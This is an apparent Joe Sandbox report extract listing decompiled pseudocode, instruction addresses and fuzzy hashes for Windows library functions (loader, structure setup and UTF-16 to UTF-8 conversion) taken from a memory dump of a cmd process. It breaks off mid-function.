										 *(_t237 - 0x40) = _t224;
										 *(_t237 - 0x50) = _t224;
										_t193 =  *(_t237 - 0x44);
										continue;
									}
									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
									goto L17;
								}
								 *_t235 = _t236;
								_t165 = 0x10 + _t163 * 0xc;
								__eflags = _t165;
								_push(_t165);
								_push(_t235);
								_push(0x23);
								_push(0xffffffff);
								_t193 = E037096C0();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t235 = _t237 - 0x38;
						 *(_t237 - 0x60) = _t235;
						goto L8;
					}
					goto L4;
				}
			}

0x036d849b
0x036d849b
0x036d849b
0x036d849b
0x036d849d
0x036d84a2
0x036d84a7
0x036d84b1
0x036d84d8
0x00000000
0x036d84b3
0x036d84c4
0x036d84c9
0x036d84cd
0x036d84cf
0x036d84cf
0x036d84d6
0x036d84e6
0x036d84e9
0x036d84ec
0x036d84ef
0x036d84f2
0x036d84f4
0x036d84fc
0x036d8501
0x036d8506
0x036d8509
0x036d86e0
0x036d86e5
0x036d86e8
0x036d86ed
0x036d86f0
0x036d86f2
0x03729afd
0x03729b02
0x036d84da
0x036d84df
0x036d84df
0x036d86fa
0x036d86fd
0x036d86fe
0x036d8701
0x036d8706
0x036d8709
0x036d870b
0x00000000
0x00000000
0x036d8711
0x036d8725
0x036d8727
0x036d872a
0x036d872c
0x03729af0
0x03729af5
0x036d8732
0x036d8732
0x036d8732
0x036d8735
0x036d8737
0x036d8515
0x036d8515
0x036d8518
0x036d851d
0x036d8523
0x036d8527
0x036d852b
0x036d8537
0x036d8539
0x036d853c
0x036d853e
0x036d868c
0x036d8691
0x036d8699
0x036d869b
0x036d8744
0x036d8748
0x036d86a1
0x036d86a1
0x036d86a1
0x036d86a4
0x036d86a8
0x03729bdf
0x03729bdf
0x036d86ae
0x036d86b0
0x00000000
0x036d86b6
0x00000000
0x03729be9
0x036d86b0
0x036d8544
0x036d854a
0x036d854d
0x036d8551
0x036d876e
0x036d8778
0x036d877b
0x036d8780
0x036d8557
0x036d8557
0x036d855d
0x036d855d
0x036d856b
0x036d856e
0x036d8570
0x036d8573
0x036d8576
0x036d8576
0x036d8579
0x036d857b
0x00000000
0x00000000
0x036d8581
0x036d85a0
0x036d85a2
0x036d85a5
0x036d85a7
0x03729b1b
0x03729b1b
0x036d862e
0x036d862e
0x036d8631
0x036d8631
0x036d8634
0x036d8636
0x036d8669
0x036d8669
0x036d866b
0x03729bbf
0x03729bc4
0x03729bc8
0x03729bce
0x03729bce
0x036d8671
0x036d8671
0x036d8674
0x036d8676
0x03729bae
0x03729bae
0x036d8676
0x036d867c
0x036d867e
0x036d8688
0x036d8688
0x00000000
0x036d867e
0x036d8638
0x036d8638
0x036d863b
0x036d863e
0x036d863f
0x036d8642
0x036d8645
0x036d8648
0x036d864d
0x03729b69
0x03729b6e
0x03729b7b
0x03729b81
0x03729b85
0x03729b89
0x03729ba7
0x03729b8b
0x03729b91
0x03729b9a
0x03729b9f
0x03729b9f
0x036d8788
0x036d878d
0x036d8763
0x036d8763
0x036d8766
0x00000000
0x036d8766
0x03729b70
0x00000000
0x03729b70
0x036d8656
0x036d865a
0x036d865c
0x036d8752
0x036d8756
0x00000000
0x00000000
0x036d875e
0x00000000
0x036d875e
0x036d8662
0x036d8662
0x036d8662
0x036d8666
0x00000000
0x036d8666
0x036d85b7
0x036d85b9
0x036d85bc
0x036d85bf
0x036d85cc
0x036d85d1
0x036d85d4
0x036d85db
0x036d85de
0x036d85e0
0x03729b5f
0x00000000
0x03729b5f
0x036d85e6
0x036d85ea
0x036d86c3
0x036d86c5
0x036d86c8
0x036d86ca
0x03729b16
0x00000000
0x03729b16
0x036d86d6
0x036d85f6
0x036d85f6
0x036d85f9
0x036d8602
0x036d8606
0x036d860a
0x036d860b
0x036d860e
0x036d8611
0x00000000
0x036d8611
0x036d85f3
0x00000000
0x036d85f3
0x036d8619
0x036d861e
0x036d861e
0x036d8621
0x036d8622
0x036d8623
0x036d8625
0x036d862c
0x00000000
0x036d873d
0x00000000
0x036d873d
0x036d8737
0x036d850f
0x036d8512
0x00000000
0x036d8512
0x00000000
0x036d84d6

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23f1929257cf7604aaea0f4a84e68254b68882a07093cb7052fb82dcaf33bfd7
Instruction ID: 2bf445653b1833bcbe4a80c62a5b35e7244f5425b0482a800a579610a505ea35
Opcode Fuzzy Hash: 23f1929257cf7604aaea0f4a84e68254b68882a07093cb7052fb82dcaf33bfd7
Instruction Fuzzy Hash: A9B16B74E00359DFCB18DFA9C988AAEBBB9BF49304F14412EE505AB345D770A855CF90

Uniqueness

Uniqueness Score: -1.00%

Function 036F513A Relevance: .3, Instructions: 258
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E036F513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x37bd360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E0370D0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E036E2280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L036E4620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E0370F3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E036DFFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x37bb1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return E0370B640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}

0x036f5142
0x036f514c
0x036f5150
0x036f5157
0x036f5159
0x036f515e
0x036f5165
0x036f5169
0x036f516c
0x036f5172
0x036f5176
0x036f517a
0x036f517a
0x036f517a
0x036f517f
0x03736d8b
0x03736d8e
0x03736d91
0x03736d95
0x03736d98
0x03736d9c
0x03736da0
0x03736da3
0x03736da7
0x03736e26
0x03736e26
0x03736e2a
0x036f51f9
0x036f51f9
0x036f51fe
0x03736e33
0x03736e33
0x03736e39
0x03736e3d
0x03736e46
0x03736e50
0x00000000
0x00000000
0x03736e52
0x03736e53
0x03736e56
0x03736e5d
0x00000000
0x00000000
0x00000000
0x03736e5f
0x03736e67
0x03736e77
0x03736e7f
0x03736e80
0x03736e88
0x03736e90
0x03736e9f
0x03736ea5
0x03736ea9
0x03736eb1
0x03736ebf
0x00000000
0x00000000
0x03736ecf
0x03736ed3
0x00000000
0x00000000
0x03736edb
0x03736ede
0x03736ee1
0x03736ee8
0x03736eeb
0x03736eed
0x03736ef0
0x03736ef4
0x03736ef8
0x03736efc
0x00000000
0x00000000
0x03736f0d
0x03736f11
0x03736f32
0x03736f37
0x03736f3b
0x03736f3e
0x03736f41
0x03736f46
0x00000000
0x00000000
0x03736f4c
0x03736f50
0x03736f50
0x03736f54
0x03736f62
0x03736f65
0x03736f6d
0x03736f7b
0x03736f7b
0x03736f93
0x03736f98
0x03736fa0
0x03736fa6
0x03736fb3
0x03736fb6
0x03736fbf
0x03736fc1
0x03736fd5
0x03736fda
0x03736fda
0x03736fdd
0x03736fe2
0x03736fe7
0x03736feb
0x03736fef
0x03736ff3
0x036f520c
0x036f520c
0x036f520f
0x036f5215
0x036f5234
0x036f523a
0x036f523a
0x036f5244
0x036f5245
0x036f5246
0x036f5251
0x036f5251
0x03736f13
0x03736f17
0x03736f17
0x03736f18
0x03736f1b
0x03736f1f
0x03736f23
0x00000000
0x03736f28
0x036f5204
0x036f5204
0x036f5208
0x00000000
0x036f5208
0x036f5185
0x036f5188
0x036f518a
0x036f518e
0x036f5195
0x03736db1
0x03736db5
0x03736db9
0x036f519b
0x036f519b
0x036f519e
0x036f51a7
0x036f51a9
0x036f51a9
0x036f51b5
0x036f51b8
0x036f51bb
0x036f51be
0x036f51c1
0x036f51c5
0x036f51c9
0x036f51cd
0x036f51cd
0x036f51d8
0x036f51dc
0x036f51e0
0x03736dcc
0x03736dd0
0x03736dd5
0x03736ddd
0x03736de1
0x03736de1
0x03736de5
0x03736deb
0x03736df1
0x03736df7
0x03736dfd
0x03736e01
0x03736e05
0x03736e09
0x03736e0d
0x03736e11
0x03736e11
0x036f51eb
0x03736e1a
0x03736e1f
0x03736e21
0x03736e23
0x00000000
0x036f51f1
0x036f51f1
0x00000000
0x036f51f1

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e7b2cb03bc10190862854ddc74941897286852d45065c5255f47063c010adf4
Instruction ID: bd27e98b1c920817b84b6050397923b3bd2da02703acedd8285ced7e5515ed8d
Opcode Fuzzy Hash: 0e7b2cb03bc10190862854ddc74941897286852d45065c5255f47063c010adf4
Instruction Fuzzy Hash: 54C130755093809FD354CF28C580A6AFBF1BF89304F188A6EF99A9B352D771E845CB42

Uniqueness

Uniqueness Score: -1.00%

Function 036F03E2 Relevance: .3, Instructions: 254
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E036F03E2(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t58;
				char* _t64;
				intOrPtr _t65;
				signed int _t74;
				signed int _t79;
				char* _t83;
				intOrPtr _t84;
				signed int _t93;
				signed int _t94;
				signed char* _t95;
				signed int _t99;
				signed int _t100;
				signed char* _t101;
				signed int _t105;
				signed int _t119;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t127;

				_v8 =  *0x37bd360 ^ _t127;
				_t119 = __ecx;
				_t105 = __edx;
				_t118 = 0;
				_v20 = __edx;
				_t120 =  *(__ecx + 0x20);
				if(E036F0548(__ecx, 0) != 0) {
					_t56 = 0xc000022d;
					L23:
					return E0370B640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
				} else {
					_v12 = _v12 | 0xffffffff;
					_t58 = _t120 + 0x24;
					_t109 =  *(_t120 + 0x18);
					_t118 = _t58;
					_v16 = _t58;
					E036DB02A( *(_t120 + 0x18), _t118, 0x14a5);
					_v52 = 0x18;
					_v48 = 0;
					0x840 = 0x40;
					if( *0x37b7c1c != 0) {
					}
					_v40 = 0x840;
					_v44 = _t105;
					_v36 = 0;
					_v32 = 0;
					if(E036E7D50() != 0) {
						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t64 = 0x7ffe0384;
					}
					if( *_t64 != 0) {
						_t65 =  *[fs:0x30];
						__eflags =  *(_t65 + 0x240) & 0x00000004;
						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
							_t100 = E036E7D50();
							__eflags = _t100;
							if(_t100 == 0) {
								_t101 = 0x7ffe0385;
							} else {
								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t101 & 0x00000020;
							if(( *_t101 & 0x00000020) != 0) {
								_t118 = _t118 | 0xffffffff;
								_t109 = 0x1485;
								E03747016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E03709830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E037469A6(_t119, __eflags);
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0x37b7c04 != 0) {
						_t118 = _v12;
						_t120 = E0374A7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0x37b7bd8;
						if( *0x37b7bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E037095D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push(0x1000000);
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E037099A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = E03743540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E036CB1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E0370AAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0x37b8474 - 3;
										if( *0x37b8474 != 3) {
											 *0x37b79dc =  *0x37b79dc + 1;
										}
									}
								}
							}
						}
						goto L52;
					}
					if(E036E7D50() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t83 = 0x7ffe0384;
					}
					if( *_t83 != 0) {
						_t84 =  *[fs:0x30];
						__eflags =  *(_t84 + 0x240) & 0x00000004;
						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
							_t94 = E036E7D50();
							__eflags = _t94;
							if(_t94 == 0) {
								_t95 = 0x7ffe0385;
							} else {
								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t95 & 0x00000020;
							if(( *_t95 & 0x00000020) != 0) {
								E03747016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
						if( *0x37b8708 != 0) {
							_t118 =  *0x7ffe0330;
							_t123 =  *0x37b7b00; // 0x0
							asm("ror esi, cl");
							 *0x37bb1e0(_v12, _v20, 0x20);
							_t93 =  *(_t123 ^  *0x7ffe0330)();
							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
							asm("sbb esi, esi");
							_t120 =  ~_t50 & _t93;
						} else {
							_t120 = 0;
						}
					}
					if( !_t120 >= 0) {
						L19:
						_push( *_t105);
						E037095D0();
						 *_t105 =  *_t105 & 0x00000000;
						goto L20;
					}
					_t120 = E036D7F65(_t119);
					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
						__eflags = _t120;
						if(_t120 < 0) {
							goto L19;
						}
						 *(_t119 + 0x64) = _v12;
						goto L22;
					}
					goto L19;
				}
			}

0x036f03f1
0x036f03f7
0x036f03f9
0x036f03fb
0x036f03fd
0x036f0400
0x036f040a
0x03734c7a
0x036f0537
0x036f0547
0x036f0410
0x036f0410
0x036f0414
0x036f0417
0x036f041a
0x036f0421
0x036f0424
0x036f042b
0x036f043b
0x036f043e
0x036f043f
0x036f043f
0x036f0446
0x036f0449
0x036f044c
0x036f044f
0x036f0459
0x03734c8d
0x036f045f
0x036f045f
0x036f045f
0x036f0467
0x03734c97
0x03734c9d
0x03734ca4
0x03734caa
0x03734caf
0x03734cb1
0x03734cc3
0x03734cb3
0x03734cbc
0x03734cbc
0x03734cc8
0x03734ccb
0x03734cd7
0x03734cda
0x03734cdf
0x03734cdf
0x03734ccb
0x03734ca4
0x036f046d
0x036f046f
0x036f046f
0x036f0471
0x036f0476
0x036f047a
0x036f047b
0x036f0483
0x036f0489
0x036f048d
0x00000000
0x00000000
0x03734ce9
0x03734cef
0x03734d22
0x03734d22
0x00000000
0x03734d22
0x03734cf1
0x03734cf7
0x00000000
0x00000000
0x03734cf9
0x03734cff
0x00000000
0x00000000
0x03734d05
0x03734d07
0x00000000
0x00000000
0x03734d0d
0x03734d0f
0x03734d14
0x03734d16
0x00000000
0x00000000
0x03734d1c
0x03734d1c
0x036f0499
0x036f0535
0x036f0535
0x00000000
0x036f0535
0x036f04a6
0x03734d2c
0x03734d37
0x03734d39
0x03734d3b
0x00000000
0x00000000
0x03734d41
0x03734d48
0x036f0527
0x036f052b
0x036f052d
0x036f0530
0x036f0530
0x00000000
0x036f052b
0x03734d4e
0x036f04ac
0x036f04ac
0x036f04af
0x036f04b2
0x036f04b7
0x036f04b9
0x036f04bb
0x036f04bd
0x036f04bf
0x036f04c5
0x036f04c9
0x03734d53
0x03734d59
0x03734db9
0x03734dba
0x03734dbf
0x03734dc2
0x03734dc4
0x03734dc7
0x03734dce
0x00000000
0x03734dce
0x03734d5b
0x03734d61
0x00000000
0x00000000
0x03734d63
0x03734d69
0x00000000
0x00000000
0x03734d6b
0x03734d6e
0x03734d74
0x03734d76
0x03734d7c
0x03734d7e
0x03734d84
0x03734d89
0x03734d8c
0x03734d8d
0x03734d92
0x03734d95
0x03734d96
0x03734d98
0x03734d9a
0x03734d9f
0x03734da4
0x03734da6
0x03734da8
0x03734daf
0x03734db1
0x03734db1
0x03734daf
0x03734da6
0x03734d84
0x03734d7c
0x00000000
0x03734d74
0x036f04d6
0x03734de1
0x036f04dc
0x036f04dc
0x036f04dc
0x036f04e4
0x03734deb
0x03734df1
0x03734df8
0x03734dfe
0x03734e03
0x03734e05
0x03734e17
0x03734e07
0x03734e10
0x03734e10
0x03734e1c
0x03734e1f
0x03734e35
0x03734e35
0x03734e1f
0x03734df8
0x036f04f1
0x036f04fa
0x03734e3f
0x03734e47
0x03734e5b
0x03734e61
0x03734e67
0x03734e69
0x03734e71
0x03734e73
0x036f0500
0x036f0500
0x036f0500
0x036f04fa
0x036f0508
0x036f051d
0x036f051d
0x036f051f
0x036f0524
0x00000000
0x036f0524
0x036f0515
0x036f0517
0x03734e7a
0x03734e7c
0x00000000
0x00000000
0x03734e85
0x00000000
0x03734e85
0x00000000
0x036f0517

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d20298f663cf38c844bbc8f4188a404cfecbec4840043d81dd38dd04283c09df
Instruction ID: f9ab9118f53715aa54ad1b98a23e2a6ec37dd3df4068bbf25a9dc55f30db3e84
Opcode Fuzzy Hash: d20298f663cf38c844bbc8f4188a404cfecbec4840043d81dd38dd04283c09df
Instruction Fuzzy Hash: 69913731E00758EFDB35DB69C948BBDBBA4EF02724F0902A5EA51AB2D2D7749D00C791

Uniqueness

Uniqueness Score: -1.00%

Function 036FEBB0 Relevance: .2, Instructions: 250
COMMONLIBRARYCODECrypto

Download Yara Rule

C-Code - Quality: 100%

			E036FEBB0(signed int* _a4, intOrPtr _a8, intOrPtr* _a12, signed short* _a16, unsigned int _a20) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				unsigned int _v20;
				intOrPtr _t42;
				unsigned int _t43;
				unsigned int _t50;
				signed char _t56;
				signed char _t60;
				signed int _t63;
				signed int _t73;
				signed int _t77;
				signed int _t80;
				unsigned int _t82;
				signed int _t87;
				signed int _t91;
				signed short _t96;
				signed short* _t98;
				signed char _t100;
				signed int* _t102;
				signed short* _t105;
				intOrPtr _t106;
				signed int _t108;
				signed int* _t110;
				void* _t113;
				signed int _t115;
				signed short* _t117;
				signed int _t118;

				_t98 = _a16;
				_t87 = 0;
				_v16 = 0;
				if(_t98 == 0) {
					return 0xc00000f2;
				}
				_t110 = _a4;
				if(_t110 == 0) {
					if(_a12 == 0) {
						_t42 = 0xc000000d;
					} else {
						_t42 = E036FED1A(_t98, _a20, _a12);
					}
					L19:
					return _t42;
				}
				_t43 = _a20;
				if((_t43 & 0x00000001) != 0) {
					_t42 = 0xc00000f3;
					goto L19;
				} else {
					_t102 = _t110;
					_t105 =  &(_t98[_t43 >> 1]);
					_v8 = _t105;
					_v12 = _a8 + _t110;
					L4:
					while(1) {
						L4:
						while(1) {
							L4:
							if(_t98 >= _t105) {
								if(_t87 == 0) {
									L17:
									_t106 = _v16;
									L18:
									_t42 = _t106;
									 *_a12 = _t102 - _a4;
									goto L19;
								}
								L8:
								_t13 = _t87 - 0xd800; // -55295
								if(_t13 <= 0x7ff) {
									_v16 = 0x107;
									_t87 = 0xfffd;
								}
								_t113 = 1;
								if(_t87 > 0x7f) {
									if(_t87 > 0x7ff) {
										if(_t87 > 0xffff) {
											_t113 = 2;
										}
										_t113 = _t113 + 1;
									}
									_t113 = _t113 + 1;
								}
								if(_t102 > _v12 - _t113) {
									_t106 = 0xc0000023;
									goto L18;
								} else {
									if(_t87 > 0x7f) {
										_t50 = _t87;
										if(_t87 > 0x7ff) {
											if(_t87 > 0xffff) {
												 *_t102 = _t50 >> 0x00000012 | 0x000000f0;
												_t102 =  &(_t102[0]);
												_t56 = _t87 >> 0x0000000c & 0x0000003f | 0x00000080;
											} else {
												_t56 = _t50 >> 0x0000000c | 0x000000e0;
											}
											 *_t102 = _t56;
											_t102 =  &(_t102[0]);
											_t60 = _t87 >> 0x00000006 & 0x0000003f | 0x00000080;
										} else {
											_t60 = _t50 >> 0x00000006 | 0x000000c0;
										}
										 *_t102 = _t60;
										_t102 =  &(_t102[0]);
										_t87 = _t87 & 0x0000003f | 0x00000080;
									}
									 *_t102 = _t87;
									_t102 =  &(_t102[0]);
									_t63 = _t105 - _t98 >> 1;
									_t115 = _v12 - _t102;
									if(_t63 > 0xd) {
										if(_t115 < _t63) {
											_t63 = _t115;
										}
										_t22 = _t63 - 5; // -5
										_t117 =  &(_t98[_t22]);
